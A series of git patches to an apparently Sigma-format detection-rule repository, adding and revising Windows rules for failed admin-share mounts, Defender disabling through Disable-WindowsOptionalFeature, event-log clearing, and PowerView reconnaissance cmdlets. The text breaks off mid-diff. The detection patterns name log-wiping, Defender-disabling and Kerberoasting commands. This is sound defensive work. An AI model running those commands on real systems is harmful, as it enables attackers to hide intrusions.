From 3a020ce4997d0b1e05fae771ad215632d47071ff Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:57:09 +0200 Subject: [PATCH 001/120] added "failed admin share mount" rule --- .../win_susp_failed_admin_share_mount.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml new file mode 100644 index 000000000..6d6470981 --- /dev/null +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -0,0 +1,28 @@ +title: Repeated failed mounting of administrative share +id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb +description: Detects failed (outgoing) attempts to mount an administrative share +author: Fabian Franz +status: experimental +level: medium +references: + - https://twitter.com/moti_b/status/1032645458634653697 + - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +date: 2022/08/30 +modified: 2022/08/30 +logsource: + product: windows + service: smbclient-security +detection: + selection: + EventID: 31010 + ShareName|endswith: '$' + condition: + - selection | count() > 10 +fields: + - ShareName +falsepositives: + - Legitimate administrative activity + - Faulty scripts +tags: + - attack.t1021.002 + - attack.lateral_movement \ No newline at end of file From df2ef5a2ee7c2a35d4cb93c45efd8f46a4bf8533 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:59:29 +0200 Subject: [PATCH 002/120] added missing newline --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 6d6470981..2fbc5497e 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -25,4 +25,4 @@ falsepositives: - Faulty scripts tags: - attack.t1021.002 - - attack.lateral_movement \ No newline at end of file + - attack.lateral_movement From ab9e15f4563b899953b6b7ce628714ef00a2cfa4 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Thu, 1 Sep 2022 17:05:32 +0200 Subject: [PATCH 003/120] fix title --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 2fbc5497e..d18cc79b7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,6 +1,6 @@ -title: Repeated failed mounting of administrative share +title: Failed Mounting of Administrative Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental level: medium From 3d9d90f43efc41692047e3ca0ba527f87c78b1f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 2 Sep 2022 17:24:28 +0200 Subject: [PATCH 004/120] Update win_susp_failed_admin_share_mount.yml --- .../smbclient/win_susp_failed_admin_share_mount.yml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index d18cc79b7..9ff0745f6 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,12 +1,14 @@ -title: Failed Mounting of Administrative Share +title: Multiple Failed Mount Attempts of Admin Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental -level: medium references: - https://twitter.com/moti_b/status/1032645458634653697 - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +tags: + - attack.t1021.002 + - attack.lateral_movement date: 2022/08/30 modified: 2022/08/30 logsource: @@ -16,13 +18,10 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + condition: selection | count() > 10 fields: - ShareName falsepositives: - Legitimate administrative activity - Faulty scripts -tags: - - attack.t1021.002 - - attack.lateral_movement +level: medium From a8eb1ba9723ff94c8cd4bf7545ce393d24bc06af Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 7 Sep 2022 16:52:09 +0200 Subject: [PATCH 005/120] rename rule --- ...share_mount.yml => win_susp_failed_hidden_share_mount.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/builtin/smbclient/{win_susp_failed_admin_share_mount.yml => win_susp_failed_hidden_share_mount.yml} (91%) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml similarity index 91% rename from rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml rename to rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index d18cc79b7..5b3c831e7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -1,6 +1,6 @@ -title: Failed Mounting of Administrative Share +title: Failed Mounting of Hidden Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects repeated failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an hidden share author: Fabian Franz status: experimental level: medium From 860c45a0380c0814f292831996864b10d36fc6bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 9 Sep 2022 17:07:45 +0200 Subject: [PATCH 006/120] added time frame --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index 1089f8c9c..ab736de4d 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,8 +16,8 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + timeframe: 10m + condition: selection | count() > 10 fields: - ShareName falsepositives: From 486fdabe340bd344900de3a36d1e9cd102f5a777 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:15:36 +0200 Subject: [PATCH 007/120] Add posh_ps_disable_windowsoptionalfeature --- ...posh_ps_disable_windowsoptionalfeature.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..601f6b71f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,35 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2021/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + condition: all of selection* +falsepositives: + - Unknown +level: high From 5996fbf4c9b4d5502272780d558ade92eb4e7828 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:23:58 +0200 Subject: [PATCH 008/120] Fix tag --- .../posh_ps_disable_windowsoptionalfeature.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 601f6b71f..0bee0b729 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -2,7 +2,7 @@ title: Disable-WindowsOptionalFeature Command PowerShell id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 status: experimental author: frack113 -date: 2021/09/10 +date: 2022/09/10 description: | Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images @@ -10,8 +10,8 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps tags: - - attack.collection - - attack.t1119 + - attack.defense_evasion + - attack.t1562.001 logsource: product: windows category: ps_script From 51076b20783ecb833c5ccd217589fa577db4765a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:29:15 +0200 Subject: [PATCH 009/120] Update posh_ps_disable_windowsoptionalfeature.yml --- .../powershell_script/posh_ps_disable_windowsoptionalfeature.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 0bee0b729..df3121e56 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -29,6 +29,7 @@ detection: - 'Windows-Defender-Features' - 'Windows-Defender' - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox condition: all of selection* falsepositives: - Unknown From f4da079d1358922856fbbbe1d7511b97c04ad978 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:43:54 +0200 Subject: [PATCH 010/120] Add posh_ps_enable_windowsoptionalfeature --- .../posh_ps_enable_windowsoptionalfeature.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml @@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium From 0caeaaa12224700f0f502b9077568b19be893d83 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:32 +0200 Subject: [PATCH 011/120] Update rules --- ..._susp_prog_location_network_connection.yml | 50 +++++++++---------- .../proc_creation_win_susp_eventlog_clear.yml | 17 ++++--- 2 files changed, 34 insertions(+), 33 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml index da3d019ac..322528935 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html date: 2019/09/26 -modified: 2022/07/14 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -15,18 +15,19 @@ detection: selection_wevtutil: Image|endswith: '\wevtutil.exe' CommandLine|contains: - - 'clear-log' # clears specified log - - ' cl ' # short version of 'clear-log' - - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size - - ' sl ' # short version of 'set-log' + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' selection_other_ps: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - - 'Clear-EventLog' - - 'Remove-EventLog' - - 'Limit-EventLog' + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' selection_other_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: ' ClearEventLog ' From 6fa682b619e5751d37b6e75dfe265bfc447c8e16 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:36 +0200 Subject: [PATCH 012/120] Create posh_ps_susp_clear_eventlog.yml --- .../posh_ps_susp_clear_eventlog.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 From 8a504bee9ef34b1e1591514006b8e18287844e51 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:49:14 +0200 Subject: [PATCH 013/120] Add %tmp% env variable --- ...osh_ps_powerview_malicious_commandlets.yml | 250 +++++++++--------- ...tsadmin_download_uncommon_targetfolder.yml | 2 + ...eation_win_cmd_redirection_susp_folder.yml | 1 + ...c_creation_win_netsh_fw_add_susp_image.yml | 83 +++--- ...n_win_reg_import_from_suspicious_paths.yml | 2 + .../proc_creation_win_susp_curl_download.yml | 3 +- ...on_win_susp_invoke_webrequest_download.yml | 2 + ...oc_creation_win_susp_mofcomp_execution.yml | 3 +- .../proc_creation_win_susp_recon.yml | 5 +- .../proc_creation_win_susp_sharpview.yml | 14 +- ...ation_win_susp_target_location_shell32.yml | 2 + ...roc_creation_win_susp_wmic_proc_create.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 2 + ...egistry_set_susp_app_paths_persistence.yml | 2 + .../registry_set_susp_run_key_img_folder.yml | 16 +- 15 files changed, 207 insertions(+), 183 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 332337938..12701d630 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml @@ -18,131 +18,131 @@ logsource: category: ps_script definition: Script Block Logging must be enabled detection: - selection: - ScriptBlockText|contains: - - Export-PowerViewCSV - - Get-IPAddress - - Resolve-IPAddress - - Convert-NameToSid - - ConvertTo-SID - - Convert-ADName - - ConvertFrom-UACValue - - Add-RemoteConnection - - Remove-RemoteConnection - - Invoke-UserImpersonation - - Invoke-RevertToSelf - - Request-SPNTicket - - Get-DomainSPNTicket - - Invoke-Kerberoast - - Get-PathAcl - - Get-DNSZone - - Get-DomainDNSZone - - Get-DNSRecord - - Get-DomainDNSRecord - - Get-NetDomain - - Get-Domain - - Get-NetDomainController - - Get-DomainController - - Get-NetForest - - Get-Forest - - Get-NetForestDomain - - Get-ForestDomain - - Get-NetForestCatalog - - Get-ForestGlobalCatalog - - Find-DomainObjectPropertyOutlier - - Get-NetUser - - Get-DomainUser - - New-DomainUser - - Set-DomainUserPassword - - Get-UserEvent - - Get-DomainUserEvent - - Get-NetComputer - - Get-DomainComputer - - Get-ADObject - - Get-DomainObject - - Set-ADObject - - Set-DomainObject - - Get-ObjectAcl - - Get-DomainObjectAcl - - Add-ObjectAcl - - Add-DomainObjectAcl - - Invoke-ACLScanner - - Find-InterestingDomainAcl - - Get-NetOU - - Get-DomainOU - - Get-NetSite - - Get-DomainSite - - Get-NetSubnet - - Get-DomainSubnet - - Get-DomainSID - - Get-NetGroup - - Get-DomainGroup - - New-DomainGroup - - Find-ManagedSecurityGroups - - Get-DomainManagedSecurityGroup - - Get-NetGroupMember - - Get-DomainGroupMember - - Add-DomainGroupMember - - Get-NetFileServer - - Get-DomainFileServer - - Get-DFSshare - - Get-DomainDFSShare - - Get-NetGPO - - Get-DomainGPO - - Get-NetGPOGroup - - Get-DomainGPOLocalGroup - - Find-GPOLocation - - Get-DomainGPOUserLocalGroupMapping - - Find-GPOComputerAdmin - - Get-DomainGPOComputerLocalGroupMapping - - Get-DomainPolicy - - Get-NetLocalGroup - - Get-NetLocalGroupMember - - Get-NetShare - - Get-NetLoggedon - - Get-NetSession - - Get-LoggedOnLocal - - Get-RegLoggedOn - - Get-NetRDPSession - - Invoke-CheckLocalAdminAccess - - Test-AdminAccess - - Get-SiteName - - Get-NetComputerSiteName - - Get-Proxy - - Get-WMIRegProxy - - Get-LastLoggedOn - - Get-WMIRegLastLoggedOn - - Get-CachedRDPConnection - - Get-WMIRegCachedRDPConnection - - Get-RegistryMountedDrive - - Get-WMIRegMountedDrive - - Get-NetProcess - - Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + - Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..dada69bd7 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -19,6 +19,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml @@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - 